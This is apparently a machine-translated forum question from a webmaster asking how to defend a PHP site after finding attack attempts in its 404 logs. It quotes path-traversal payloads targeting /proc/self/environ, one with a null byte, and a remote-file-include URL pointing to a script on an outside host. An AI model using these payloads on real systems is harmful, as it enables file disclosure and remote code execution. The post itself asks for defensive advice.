Przeglądając moje dzienniki 404 zauważyłem dwa następujące adresy URL, które wystąpiły raz:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
i
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
Ta strona library.php
wymaga type
zmiennej o pół tuzinie różnych dopuszczalnych wartości, a następnie id
zmiennej. Może to być prawidłowy adres URL
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
a wszystkie identyfikatory są uruchamiane mysql_real_escape_string
przed użyciem do zapytania do bazy danych.
Jestem debiutantem, ale wydaje mi się, że oba te linki są prostymi atakami na webroota?
1) Jak najlepiej chronić się przed tego rodzaju rzeczami poza 404?
2) Czy powinienem permabanować odpowiedzialne adresy IP?
EDYCJA: właśnie to zauważyłem
/library.php=http://www.basfalt.no/scripts/danger.txt
EDYCJA 2: Obraźliwe IP dla wszystkich 3 ataków było 216.97.231.15
śladem dostawcy usług internetowych o nazwie Lunar Pages znajdującym się na obrzeżach Los Angeles.
EDYCJA 3: Postanowiłem zadzwonić do ISP w piątek rano czasu lokalnego i przedyskutować problem z kimkolwiek, kto może uzyskać telefon. Opublikuję wyniki tutaj za około 24 godziny.
EDYCJA 4: Skończyłem pisać e-mailem do swoich administratorów, a oni odpowiedzieli najpierw, że „szukali tego”, a następnie dzień później z „ten problem powinien zostać rozwiązany teraz”. Niestety żadnych dalszych szczegółów.
type
Informuje skrypt, który zawierać do użytku (chociaż przez IF $_GET['type'] == 'thing') {} ESLE...
nie jako bezpośredni link podobnego include 'type.php'
) i id
jest prowadzony przez mysql_real_escape_string i który służy do zapytaniami. Wiedząc o tym, czy nadal jestem bezpieczny?